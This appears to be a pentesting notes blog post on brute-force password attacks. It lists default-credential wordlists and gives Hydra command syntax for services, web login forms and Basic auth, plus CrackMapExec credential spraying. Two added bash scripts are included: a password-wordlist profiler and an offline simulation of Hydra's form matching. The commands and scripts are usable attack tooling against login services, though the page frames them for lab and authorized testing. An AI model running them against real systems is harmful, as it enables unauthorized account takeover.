
Pentesting - Brute Force

Default Credentials

Some wordlists with default and commonly used passwords for different services (rockyou is a leaked-password list rather than a default-credential list, but it is the usual companion to the others):

  • SecLists

  • Rockyou

  • https://github.com/ihebski/DefaultCreds-cheat-sheet/blob/main/DefaultCreds-Cheat-Sheet.csv

  • https://github.com/govolution/betterdefaultpasslist

  • https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/darkweb2017-top100.txt

  • https://github.com/ihebski/DefaultCreds-cheat-sheet

creds (the command shipped with the DefaultCreds-cheat-sheet project) is a handy tool for looking up the default credentials of a given product or service.

Installation:

pip3 install defaultcreds-cheat-sheet

Example:

creds search tomcat

Personalized Wordlists

Some tools build a custom dictionary from what is known about the target (names, birth dates, partners, pets, nicknames). cupp in interactive mode asks for that profile and mangles it into candidate passwords:

Command:

cupp -i
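
As an added example (not cupp's own code, and not part of the original post), here is a minimal cupp-style profiler in bash. It takes a few facts about a target, applies the usual mangling rules (case variants, simple leet substitution, year and symbol suffixes) and prints a deduplicated candidate list ready for hydra -P. The profile used in the demo call (john, doe, 1990, rex) is made up.

```bash
#!/usr/bin/env bash
# Added example: a minimal cupp-style password profiler.
# Not cupp's code; cupp reads an interactive profile (cupp -i) and applies
# far more rules. The sample profile used at the bottom is made up.

lower() { printf '%s' "$1" | tr 'A-Z' 'a-z'; }

# base_tokens NAME SURNAME BIRTHYEAR PETNAME
# Lower-cased facts plus the combinations people actually use.
base_tokens() {
    local name surname pet
    name=$(lower "$1"); surname=$(lower "$2"); pet=$(lower "$4")
    printf '%s\n' "$name" "$surname" "$pet" "$name$surname" "$name$pet"
}

# case_variants TOKEN
# Emits the token as-is, Capitalised, UPPER-CASED and in simple leet
# (a e i o s -> 4 3 1 0 5).
case_variants() {
    local t="$1"
    printf '%s\n' "$t"
    printf '%s\n' "$t" | awk '{ print toupper(substr($0, 1, 1)) substr($0, 2) }'
    printf '%s\n' "$t" | tr 'a-z' 'A-Z'
    printf '%s\n' "$t" | tr 'aeios' '43105'
}

# gen_wordlist NAME SURNAME BIRTHYEAR PETNAME
# Every variant of every token gets each suffix appended: nothing, the full
# birth year, its last two digits, "123", "1", "!" and "<year>!".
# Output is deduplicated so it can be fed straight to hydra -P.
gen_wordlist() {
    local year="$3" yy="${3#??}"
    base_tokens "$@" | while IFS= read -r tok; do
        case_variants "$tok" | while IFS= read -r v; do
            for s in "" "$year" "$yy" "123" "1" "!" "$year!"; do
                printf '%s\n' "$v$s"
            done
        done
    done | LC_ALL=C sort -u
}

# Demo with a made-up profile; redirect to a file to use it with hydra -P.
gen_wordlist john doe 1990 rex | head -n 5
```

With the demo profile this yields 140 candidates such as John1990, DOE90, johndoe123 and j0hnr3x!; the real cupp adds many more rules (reversals, separators, mutual combinations), so treat this as an illustration of the idea rather than a replacement.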

Brute Force against Services

Hydra is an online password-guessing tool: it runs brute-force and dictionary attacks directly against network services (FTP, SSH, SMB, HTTP forms and many others) and reports which credentials the service accepts. Every guess is a real login attempt, so check for account-lockout policies and rate limiting before running it against a target.

Syntax with dictionaries (upper-case -L and -P take a file, lower-case -l and -p take a single value; -s sets a non-default port):

hydra -L <pathFile-usernames> -P <pathFile-passwords> <IP> -s <port> <service>

Syntax command with known credentials:

hydra -l <username> -p <password> <IP> <service>

It can also be combined:

hydra -l <username> -P <pathFile-passwords> <IP> <service>

or:

hydra -L <pathFile-usernames> -p <password> <IP> <service>

Examples (the two forms are equivalent: the service can be given as a URL scheme or as a separate argument after host:port):

hydra -L users.list -P passwords.list ftp://10.129.150.181:2121
hydra -L users.list -P passwords.list 10.129.150.181:2121 ftp

Brute Force against Login Forms

Syntax:

1
hydra -l <username> -P </passwords_list.txt> <target> http-post-form "/<login-page.php>:<fieldUsername>=<username>&<fieldPassword>=^PASS^:<text>"

Example:

hydra -l admin -P ./passwords.txt monitoring.inlanefreight.local http-post-form "/login.php:username=admin&password=^PASS^:Invalid Credentials!"

Other example:

hydra -l admin -P ./rockyou.txt 10.129.166.127 http-post-form "/monitoring/login.php:username=admin&password=^PASS^:Invalid Credentials!"

The page path, the form field names and the failure message all come from the login page itself: open the browser's developer tools (right-click, Inspect, or the Network tab), submit a bogus login and copy the POST request's path and parameter names exactly as the browser sends them, together with the error text the page returns.

The text at the end of the command is the failure condition: Hydra treats every response that does not contain it as a successful login. It therefore has to match the real error message exactly (a typo makes the very first guess look valid). When the failure page varies, use S=<text> instead, matching a string that only appears after a successful login, such as a dashboard title or a redirect.
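
To make the failure-string logic concrete, here is an added bash example (not Hydra's code and not from the original post). It interprets a Hydra-style page:params:condition spec the way Hydra does: it substitutes ^USER^ and ^PASS^ into the form body, submits each candidate to a login handler, and reports a hit when the response lacks the failure string (or, with an S= condition, when it contains the success string). The login handler mock_login, its valid credential (admin / S3cret!) and the wordlist are constructed stand-ins for the real target so that it runs offline; the last call shows why a wrong failure string produces a false positive on the very first guess.

```bash
#!/usr/bin/env bash
# Added example: Hydra-style http-post-form matching, simulated offline.
# Not Hydra's code. The target (mock_login), its valid credential and the
# wordlist below are constructed for the demo.

# mock_login PAGE BODY
# Stand-in for the web application: parses the urlencoded POST body and
# returns the HTML a real application would, for success or failure.
mock_login() {
    local page="$1" body="$2" user="" pass="" kv
    local -a fields
    IFS='&' read -r -a fields <<< "$body"
    for kv in "${fields[@]}"; do
        case "$kv" in
            username=*) user=${kv#username=} ;;
            password=*) pass=${kv#password=} ;;
        esac
    done
    if [ "$page" = "/login.php" ] && [ "$user" = "admin" ] && [ "$pass" = "S3cret!" ]; then
        printf '<html><body><h1>Dashboard</h1></body></html>'
    else
        printf '<html><body><p>Invalid Credentials!</p></body></html>'
    fi
}

# brute_post_form SPEC USER WORDLIST
# SPEC follows hydra's http-post-form syntax "page:params:condition". The
# condition is a failure string by default (or with F=), or a success
# string with S=. Prints the first password that matches and returns 0,
# or returns 1 when the wordlist is exhausted.
brute_post_form() {
    local spec="$1" user="$2" wordlist="$3"
    local page rest params cond mode needle body resp pass hit
    page=${spec%%:*}
    rest=${spec#*:}
    params=${rest%%:*}
    cond=${rest#*:}
    case "$cond" in
        S=*) mode=success; needle=${cond#S=} ;;
        F=*) mode=failure; needle=${cond#F=} ;;
        *)   mode=failure; needle=$cond ;;
    esac
    while IFS= read -r pass || [ -n "$pass" ]; do
        # Quoted replacements keep a literal "&" in a candidate intact.
        body=${params//^USER^/"$user"}
        body=${body//^PASS^/"$pass"}
        resp=$(mock_login "$page" "$body")
        hit=0
        if printf '%s' "$resp" | grep -qF -- "$needle"; then
            [ "$mode" = success ] && hit=1
        else
            [ "$mode" = failure ] && hit=1
        fi
        if [ "$hit" -eq 1 ]; then
            printf '%s\n' "$pass"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Constructed wordlist for the demo.
WORDLIST=$(mktemp)
trap 'rm -f "$WORDLIST"' EXIT
printf '%s\n' password 123456 admin 'S3cret!' letmein > "$WORDLIST"

# Correct failure string: only the real password is reported.
brute_post_form '/login.php:username=^USER^&password=^PASS^:Invalid Credentials!' admin "$WORDLIST"
# Equivalent success-string condition.
brute_post_form '/login.php:username=^USER^&password=^PASS^:S=Dashboard' admin "$WORDLIST"
# Wrong failure string (it never appears in any response): the first guess
# is reported as valid, the classic false positive.
brute_post_form '/login.php:username=^USER^&password=^PASS^:Login failed' admin "$WORDLIST"
```

The first two calls print S3cret!, the third prints password. Before trusting a Hydra hit, confirm it by hand with the reported credential; the false-positive case above is exactly what a mistyped failure string looks like in practice.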

Example of a brute-force attack against an HTTP Basic authentication prompt (the browser login popup), using a user:password combo file (-C) with the http-get module on a non-default port:

hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 167.99.197.55 -s 30705 http-get /

Password Attacks

Crackmapexec

CrackMapExec (CME) is a post-exploitation and lateral-movement tool for Windows and Active Directory networks. It speaks SMB, WinRM, LDAP, MSSQL, SSH and other protocols, and one of its everyday uses is testing credentials (single values or whole lists) against many hosts at once. Its maintained successor is NetExec (nxc), which keeps the same command syntax.

Syntax (-u and -p each accept either a literal value or a path to a file):

crackmapexec <protocol> <target> -u <user or userlist> -p <password or passwordlist>

Examples:

crackmapexec winrm 10.129.42.197 -u user.list -p password.list
crackmapexec smb 10.129.42.197 -u "user" -p "password"

With two files CME tries every password against every user, which on a domain-joined target can quickly trip the account-lockout threshold. --no-bruteforce pairs the lists line by line instead (user1 with password1, user2 with password2), and --continue-on-success keeps going after a hit rather than stopping at the first valid credential.
This post is licensed under CC BY 4.0 by the author.